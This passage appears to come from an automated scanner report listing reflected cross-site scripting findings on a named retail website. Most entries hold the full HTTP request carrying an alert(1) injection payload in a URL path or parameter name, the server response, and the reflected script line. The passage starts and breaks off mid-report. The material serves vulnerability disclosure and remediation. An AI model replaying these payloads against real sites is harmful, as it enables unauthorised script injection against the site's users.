The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c39ae"-alert(1)-"affbc874198 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accessories/women/?c39ae"-alert(1)-"affbc874198=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b4aa"-alert(1)-"eed14cdfb13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /arcade9b4aa"-alert(1)-"eed14cdfb13/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:18:54 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=enh4qopt52d480f45ghi1eifu3; expires=Tue, 09-Nov-2010 17:18:54 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29342
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/arcade9b4aa"-alert(1)-"eed14cdfb13/"); //]]> ...[SNIP]...
1.19. http://www.fredperry.com/arcade/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/arcade/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a634a"-alert(1)-"292ae239ba4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /arcade/?a634a"-alert(1)-"292ae239ba4=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e542"-alert(1)-"ab556611c86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bags1e542"-alert(1)-"ab556611c86/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:21:47 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=6et872hljcv57tm45lk8ssvqp2; expires=Tue, 09-Nov-2010 17:21:47 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29340
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/bags1e542"-alert(1)-"ab556611c86/"); //]]> ...[SNIP]...
1.21. http://www.fredperry.com/bags/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/bags/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 672ee"-alert(1)-"71633396054 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bags/?672ee"-alert(1)-"71633396054=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11130"-alert(1)-"1f093ec014e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bags11130"-alert(1)-"1f093ec014e/men/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:21:41 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=eu32c8hn6p6l6pl7shl718a3s1; expires=Tue, 09-Nov-2010 17:21:41 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29344
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/bags11130"-alert(1)-"1f093ec014e/men/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 700bd"-alert(1)-"638b67561b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bags/men700bd"-alert(1)-"638b67561b1/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:22:16 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=2dpnq9s6uhordu2ekaag73oqd1; expires=Tue, 09-Nov-2010 17:22:16 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29344
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/bags/men700bd"-alert(1)-"638b67561b1/"); //]]> ...[SNIP]...
1.24. http://www.fredperry.com/bags/men/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/bags/men/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dc8a"-alert(1)-"a9caf531ee8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bags/men/?9dc8a"-alert(1)-"a9caf531ee8=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f04a"-alert(1)-"172e220982f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bags6f04a"-alert(1)-"172e220982f/women/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:22:26 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=94un9ikch5osarj2upkkdtsjg7; expires=Tue, 09-Nov-2010 17:22:26 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29346
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/bags6f04a"-alert(1)-"172e220982f/women/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fabc8"-alert(1)-"0f5859d0a8d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bags/womenfabc8"-alert(1)-"0f5859d0a8d/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:22:41 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=1vqfpruo2fkaf33lekrligvrs3; expires=Tue, 09-Nov-2010 17:22:42 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29346
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/bags/womenfabc8"-alert(1)-"0f5859d0a8d/"); //]]> ...[SNIP]...
1.27. http://www.fredperry.com/bags/women/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/bags/women/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 711a1"-alert(1)-"4fddbd7dfbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bags/women/?711a1"-alert(1)-"4fddbd7dfbd=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6533"-alert(1)-"855d4def8e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /catalogsearcha6533"-alert(1)-"855d4def8e2/ajax/suggest/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:34:37 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=msbkftrehe2499gnpdc6fhajb3; expires=Tue, 09-Nov-2010 17:34:38 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29362
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/catalogsearcha6533"-alert(1)-"855d4def8e2/ajax/suggest/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5389"-alert(1)-"a8da9f27867 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /catalogsearch/ajaxa5389"-alert(1)-"a8da9f27867/suggest/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:36:22 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=7ht57d6h8og3t308gnu6l0nns3; expires=Tue, 09-Nov-2010 17:36:22 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29362
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/catalogsearch/ajaxa5389"-alert(1)-"a8da9f27867/suggest/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a148d"-alert(1)-"ab7ff097b6d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /catalogsearch/ajax/suggesta148d"-alert(1)-"ab7ff097b6d/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:37:50 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=miih4kiqs00u95msd9dc70fdt3; expires=Tue, 09-Nov-2010 17:37:50 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29362
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/catalogsearch/ajax/suggesta148d"-alert(1)-"ab7ff097b6d/"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49ade"-alert(1)-"9853f03a934 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /catalogsearch49ade"-alert(1)-"9853f03a934/result/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:22:14 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=30se6b9v1g6p0lo6svqgj1vgs1; expires=Tue, 09-Nov-2010 17:22:14 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29356
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/catalogsearch49ade"-alert(1)-"9853f03a934/result/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d24f"-alert(1)-"1aca295eca0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /catalogsearch/result1d24f"-alert(1)-"1aca295eca0/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:22:35 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=bp6840rulj7bcunchiglt11ee3; expires=Tue, 09-Nov-2010 17:22:35 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29356
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/catalogsearch/result1d24f"-alert(1)-"1aca295eca0/"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6fb5f"-alert(1)-"ef4f242604b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /checkout6fb5f"-alert(1)-"ef4f242604b/cart/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:18:32 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=vi3g5moh1rl2cjoh82ejcl9rl5; expires=Tue, 09-Nov-2010 17:18:32 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/checkout6fb5f"-alert(1)-"ef4f242604b/cart/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3f96"-alert(1)-"360bb29e453 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
